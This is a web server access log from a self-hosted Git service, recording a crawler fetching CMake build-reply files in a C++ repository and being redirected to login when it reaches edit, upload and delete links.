git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 971] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:52:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:19:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:19:52:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:19:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:19:52:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:52:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11368] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:52:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:52:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11363] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11369] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:52:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:19:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:19:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11369] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11833] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:19:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26592] [Gzip 11.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:19:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13896] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9865] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:19:52:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:19:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:19:52:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:19:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:19:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10215] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:19:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9854] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:19:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11360] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:52:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:19:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:19:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14537] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:19:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:19:52:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=source" [Client 74.7.227.38] [Length 13156] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:19:52:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:19:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:19:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:19:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=rendered" [Client 74.7.227.38] [Length 11128] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:19:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9854] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:19:52:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:19:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:19:52:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:19:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:19:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:19:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:19:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:19:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=source" [Client 74.7.227.38] [Length 13156] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:19:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:19:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=source" [Client 74.7.227.38] [Length 13155] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:19:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:19:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr 